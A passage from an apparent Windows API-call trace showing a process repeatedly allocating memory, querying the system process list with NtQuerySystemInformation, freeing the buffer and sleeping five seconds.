ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0246.605] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0246.610] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0246.611] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0246.613] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0246.614] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0246.614] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0246.615] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0246.615] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0246.620] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0246.621] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0246.622] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0246.622] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0246.623] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0246.623] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0246.624] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0246.630] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0246.631] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0246.633] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0246.633] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0246.634] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0246.635] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0246.635] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0246.640] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0246.641] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0246.643] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0246.643] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0246.644] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0246.644] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0246.645] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0246.650] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0246.651] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0246.652] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0246.652] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0246.653] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0246.654] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0246.654] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0246.662] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0246.663] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0246.665] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0246.665] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0246.666] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0246.666] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0246.667] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0246.672] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0246.673] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0246.675] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0246.675] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0246.676] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0246.677] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0246.677] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0246.682] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0246.683] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0246.685] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0246.686] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0246.687] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0246.687] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0246.687] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0246.693] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0246.693] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0246.695] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0246.695] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0246.697] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0246.697] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0246.698] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0246.703] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0246.704] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0246.706] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0246.706] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0246.707] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0246.707] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0246.707] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0246.713] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0246.714] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0246.716] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0246.717] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0246.718] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0246.718] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0246.718] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0246.724] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0246.725] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0246.727] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0246.727] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0246.728] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0246.731] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0246.731] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0246.736] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0246.737] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0246.739] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0246.740] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0246.741] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0246.741] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0246.741] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0246.748] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0246.749] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0246.750] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0246.750] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0246.752] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0246.752] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0246.752] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0246.757] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0246.758] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0246.759] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0246.760] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0246.761] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0246.761] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0246.762] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0246.766] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0246.767] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0246.769] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0246.770] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0246.771] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0246.771] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0246.771] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0246.776] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0246.777] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0246.779] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0246.779] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0246.781] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0246.781] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0246.781] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0246.787] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0246.788] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0246.790] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0246.791] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0246.791] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0246.792] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0246.792] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0246.797] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0246.798] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0246.815] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0246.815] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0246.816] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0246.817] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0246.817] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0246.822] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0246.823] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0246.829] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0246.829] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0246.830] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0246.831] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0246.831] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0246.836] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0246.837] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0246.839] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 